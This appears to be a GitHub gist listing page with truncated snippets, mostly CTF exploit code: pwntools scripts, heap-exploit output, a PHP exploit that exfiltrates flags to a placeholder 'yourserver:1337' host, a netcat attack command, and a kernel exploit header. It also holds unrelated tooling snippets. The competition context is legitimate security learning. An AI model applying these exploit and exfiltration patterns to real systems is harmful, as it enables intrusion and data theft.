elnx
@laxa
laxa / EasiestPrintf.py
Created March 20, 2017 00:22
easiestprintf@0ctf2k17
#!/usr/bin/env python2
from pwn import *
###
if len(sys.argv) > 1:
    DEBUG = False
else:
    DEBUG = True
$ gcc house_of_orange.c -o house_of_orange
house_of_orange.c: In function ‘main’:
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */
^
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x30) = -1;
^
$ ./house_of_orange
@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
    $res = '';
    for ($i = 0; $i < strlen($s); $i++) {
        $res .= '\\' . dechex(ord($s[$i]));
    }
@Jinmo
Jinmo / README.md
Created August 7, 2017 01:02
Working on it

Disassembler

Let's make disassembler, easier.

1. Template parser

Template with simplicity, let's keep it simple.

mov $reg, $reg
@eboda
eboda / doit
Last active June 13, 2018 06:10
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)
def select(op):
    p.read_until('Your choice: ')
@syjcnss
syjcnss / exploit.c
Created June 5, 2017 08:20
exploit for cred_jar
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>
#define ALLOC_CTX _IO('t', 1)
@Jinmo
Jinmo / yey.py
Last active May 17, 2019 01:20
loading IDA colors (clr) file given a path to the file
from ctypes import c_ssize_t, c_void_p, c_int, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
from PyQt5.QtCore import Qt, QTimer, QObject
from PyQt5.QtGui import QResizeEvent, QFocusEvent
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp
import os
import sys
import idaapi
import idc
@mozfreddyb
mozfreddyb / innerhtml-hook.js
Last active November 6, 2019 08:55
inspect assignments to innerHTML
/* inject via
ppmm.loadFrameScript("data:,<js source>", true);
(where ppmm is the message manager, e.g. in shell.js)
framescript documentation explains why this works[1] and
the message manager docs[2] explain that the parent process
manager defined as ppmm in shell.js[3] can be used.
[1] https://developer.mozilla.org/en-US/Firefox/Multiprocess_Firefox/Frame_script_loading_and_lifetime
@saelo
saelo / pwn.py
Last active December 15, 2019 23:35
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a